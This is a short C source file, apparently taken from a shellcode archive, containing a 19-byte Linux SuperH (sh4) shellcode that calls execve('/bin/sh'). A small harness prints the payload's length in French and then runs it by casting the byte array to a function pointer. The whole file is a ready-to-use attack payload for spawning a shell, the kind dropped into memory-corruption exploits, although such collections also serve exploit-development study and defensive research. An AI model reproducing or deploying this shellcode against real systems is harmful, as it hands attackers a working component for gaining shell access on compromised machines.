/* | Title: Linux/SuperH - sh4 execve("/bin/sh", 0, 0) - 19 bytes | Date: 2011-06-22 | Tested on: Debian-sh4 2.6.32-5-sh7751r | Author: Florian Gaultier - agix - twitter: @Agixid | | http://shell-storm.org */ #include <string.h> #include <stdio.h> int main(){ char shell[] = "\x0b\xe3"// mov #11,r3 "\x02\xc7"// mova @(10,pc),r0 "\x03\x64"// mov r0,r4 "\x5a\x25"// xor r5,r5 "\x6a\x26"// xor r6,r6 "\x02\xc3"// trapa #2 "/bin/sh"; printf("[*] Taille du ShellCode = %d\n", strlen(shell)); (*(void (*)()) shell)(); return 0; }